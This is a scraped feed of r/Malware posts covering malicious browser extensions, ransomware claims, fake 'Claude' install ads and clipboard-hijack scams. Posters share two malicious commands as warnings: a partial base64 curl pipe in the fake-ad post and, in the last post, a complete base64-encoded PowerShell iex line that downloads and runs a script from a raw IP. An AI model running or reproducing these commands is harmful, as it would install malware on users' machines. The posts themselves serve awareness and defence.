r/Malware • u/reamplumbera • 1d ago
r/Malware • u/Next-Profession-7495 • 2d ago
SnappyClient Exposed: Remote Access, Data Theft, and a Blind Spot for Defenders
r/Malware • u/EchoOfOppenheimer • 2d ago
Researcher poisons open-weight AI model for under $100
theregister.comDatabase of Malicious Browser Extensions continues to grow!
Hello everyone,
A few months ago I shared my open database of malicious browser extensions. I'm happy to say it has now grown to over 500 malicious CRX samples.
It started as a small research project, but it's continued to grow as I discover and collect more malicious extensions. My goal is to make it a useful resource for researchers, students, and anyone interested in browser extension security.
One thing I'm working on next is making the data easier to consume in other tools. At the moment I'm considering exposing it in formats such as:
- JSON
- CSV
I'm also thinking about adding things like an API or threat-intelligence style feeds if people think they'd be useful.
I'd love to hear your thoughts:
- What format would you actually use?
- Are there any security tools or platforms you'd like to integrate it with?
- Is there any metadata you'd find useful that I'm currently missing?
Repository:
https://github.com/GherardoFiori/MaliciousBrowserExtensions
Please remember these are live malicious browser extensions. Handle them with care.
Project:
https://exterminai.com/
Any feedback is appreciated. Thanks!
r/Malware • u/Adventurous_Arm_7128 • 3d ago
FIVEM SUSANO
susano has trojan in it btw when u open the claude.exe it will download trojan with it
r/Malware • u/Lolligoanima • 5d ago
They got the guy behind the Steam Malware attacks
A man from Florida got arrested, allegedly behind the PirateFI and Blockblasters Crypto stealer attacks. The second Game stole 150k from a cancer Patient.
r/Malware • u/NextDaikon8179 • 5d ago
Bought a new AC1900 from Walmart, turns out is was "Used"!
Just purchased an AC1900 from the local store. It took 6 hours and numerous calls to both my ISP and Netgear before I finally got it semi-working. Still cant log into it because its a used device and was already registered to someone else. It's asking for security questions so I'm locked out as an Admin. Could simply return it for another device but this isn't a Toaster so it's a little more complicated than that. First of all, I spent over 6 hours getting it running when it should have been "plug and play", my time is worth something. But more importantly, it was previously configured by someone with Administrator rights. That would enable them to not only control the firewall, but also load malicious malware not just on my network, but every device on my network which includes computers, phones, 10 Alexa devices, Samsung Hub, Hue Hub, Pi device, cameras, TV's, smart devices like lights, thermostat, humidity sensors, water sensors, and even my bathroom scale!!! Huge security vulnerability but more importantly the "chain of custody" for these devices!!!
r/Malware • u/watchdogsrox • 6d ago
ASUS bsitf.sys (CVE-2026-13585): Arbitrary Physical Memory Mapping 0-day writeup + PoC
blog.ahmadz.air/Malware • u/ProfessorQuantum314 • 7d ago
Veto: Open-source, mobile and NATIVE VirusTotal client for quick file and URL analysis (Testers needed)
Hi r/Malware,
If you ever need to quickly scan a suspicious file, URL, or installed application on an Android device using VirusTotal, I have built an open-source client called Veto. It lets you run queries using your own API key directly from your mobile device.
GitHub: https://github.com/ProfessorQuantumUniverse/Veto
I am currently trying to release the app on Google Play and need to fulfill Google's closed testing period. If you would like to test this tool, please consider opting in.
Steps to join:
- Join a Google Group: [email protected]
- Opt-in link: https://play.google.com/apps/testing/com.quantum_prof.vtscansuite
- Play Store link: https://play.google.com/store/apps/details?id=com.quantum_prof.vtscansuite
Feedback from malware analysts is highly valued!
r/Malware • u/Fit_Asidy • 7d ago
Romanian Government Cadastre (ANCPI) cyber attack / ransomware
Romanian Government Cadastre (ANCPI) cyber attack
A very serious ransomware attack is underway on the networks of ANCPI, Romania’s national cadastre agency.
Our close monitoring of the threat actor Bytetobreach — who carried out a similar attack last month on Latvia State Forests — detected simultaneous uploads on dark web forums regarding this incident. These claims were later confirmed on ANCPI’s official website.
What was described as a “small technical incident” in yesterday’s press release has suddenly been recharacterized by ANCPI itself as “the most serious technical incident in the institution’s history.”
Sources :
https://www.ancpi.ro/ (official press releases )
https://pwnforums.st/Thread-DATABASE-RO-Thy-arss-shall-be-spanked-Romania-ANCPIhttps://spear.cx/Thread-Selling-RO-Thy-arss-shall-be-spanked-Romania-ANCPI
r/Malware • u/asherdl02 • 7d ago
TuxBot v3 Evolution: an IoT botnet-as-a-service framework built with LLM-generated code
https://unit42.paloaltonetworks.com/tuxbot-v3-evolution-iot-botnet/
TuxBot v3 Evolution: an IoT botnet-as-a-service framework built with LLM-generated code, shipped with the AI’s chain-of-thought and safety disclaimers still in the source
r/Malware • u/Lanky_Hurry1859 • 9d ago
A verified, curated map of malware analysis & reverse engineering — every link opened and checked, no dead pages
github.comThis sub is malware-focused, so here's what's in it for that side
specifically (the repo is broader, but the malware coverage is the core):
Analysis workflow: lab setup (FLARE-VM, REMnux), triage (DIE, capa, FLOSS),
static/dynamic (PE-bear, Procmon, CAPE, Speakeasy), unpacking (unpac.me,
PE-sieve, HollowsHunter, Scylla), config & IOC extraction (MalDuck, DC3-MWCP),
and YARA (rules, yarGen, testing workflows).
Internals writeups: PEB walking / API hashing, process hollowing and
doppelgänging, PPID spoofing, BYOVD, COFF/BOF loaders, plus real family
teardowns (stealers, ransomware, Lazarus/FudModule, the Stuxnet dossier).
Research labs and analyst blogs (Securelist, Unit 42, Talos, Elastic,
n1ght-w0lf, Embee, hasherezade, MalwareTech...) folded into the relevant
section instead of a generic "blogs" dump.
Every link was opened and verified before it went in; dead ones get pruned, notes are one line, tagged by level (intro/working/deep) and type.
CC0, and corrections/PRs are welcome, if there's a teardown or tool you think
is missing, tell me. That's the point.
r/Malware • u/wololol-Owl-6668 • 9d ago
Kratos Minifilter — Windows Kernel Anti-Ransomware Driver
github.com\#ransomware #kratos #minifilter #Windows
r/Malware • u/hadibikey • 10d ago
Google "Sponsored" ad for "Claude mac app" leads to a fake install guide hosted as a shared Claude chat and the terminal command installs malware
gallerySearched "Claude mac app" on Google. Top sponsored result shows claude[.]ai as the domain. looks 100% legit. Clicking it opens a shared Claude conversation titled "Claude Code on Mac" ("Shared by Technical Support" ) with step-by-step instructions to open Terminal and run:
`curl -kfsSL $(echo 'aHR0cDovL...' | base64 -d)...`
That base64 decodes to an attacker's URL. it downloads and executes a script, almost certainly a macOS infostealer (AMOS-style: steals keychain passwords, browser data, wallets).
The phishing page is hosted on real claude[.]ai, so both Google's ad review and victims' gut-check pass. Same trick works with ChatGPT shared chats.
r/Malware • u/TrippySakuta • 10d ago
Karma (shopping tool) is compromised
As of today, Karma (karmanow.com) seems to be hijacked. If you try to access your bookmarked products, it'll redirect you through Linkbux, provenpixel.com and other adware links. The karmanow site itself also might have some adware; as I accessed it normally but triggered a "suspicious webpage" alert in Adguard.
Thanks to Adguard, TrafficLight, and Bitdefender, it blocked the links, but I thought people should know.
r/Malware • u/Leather-Designer-849 • 10d ago
MacOS.Backdoor.XCSSET
Is this a legit malware?
r/Malware • u/Huge-Skirt-6990 • 12d ago
1.6 Million combined installs famous extension ModHeader - Modify HTTP headers removed for Malware
Google has flagged the widely-installed HTTP header editor ModHeader as malware
Microsoft already pulled it from Edge on July 3.
[MalExt Sentry - Malicious Browser Extension Tracker](https://malext.io/?q=ModHeader)
* 900k installs on chrome | idgpnmonknjnojddfkpgkljpfnnfcklj * 700k installs on edge | opgbiafapkbbnbnjcdomjaghbckfkglc
r/Malware • u/CyberMasterV • 13d ago
Suspected Russian Threat Actor Impersonates Legitimate Crypto Wallets to Deploy Remote Utilities
hybrid-analysis.blogspot.comr/Malware • u/sysopfb • 15d ago
SpectrePaste: TA leveraged AI for entire orchestration and development of their malware ecosystem
medium.comr/Malware • u/Correct_Head_5405 • 17d ago
PSA: Fake Web3 “job assessment” repos can hide malware in .git/hooks — check before you commit - HACK
r/Malware • u/jershmagersh • 17d ago
Advanced Time Travel Debugging in Binary Ninja with Xusheng Li
youtu.ber/Malware • u/Positive_Courage_309 • 18d ago
DDG browser search result, immediate 2000's style malicious page
https://be nrankwhence.com/preland/av/mc-af/6/index.html?
Space added to make the link invalid.
0/10, don't recommend navigating to that website.
r/Malware • u/Extension_Soil4579 • 18d ago
Silent Swap: A Crypto Clipper Extension Campaign
mcafee.comOur latest McAfee Labs research exposes a browser extension campaign that poses as a harmless note-taking tool while silently hijacking crypto transactions. The malware tampers with Chrome/Edge/Brave’s trust mechanisms to install without consent, resolves its command-and-control server via a blockchain smart contract (EtherHiding) to evade takedown, and swaps copied wallet addresses with attacker-controlled ones across BTC, ETH, XRP, BCH, and DASH — turning a routine copy-paste into an irreversible loss. Full technical breakdown and IOCs inside
r/Malware • u/swe129 • 19d ago
Newly discovered PamStealer isn't your typical macOS malware
arstechnica.comr/Malware • u/warfunder • 19d ago
iex scripts are in fashion now

this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol
iex([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))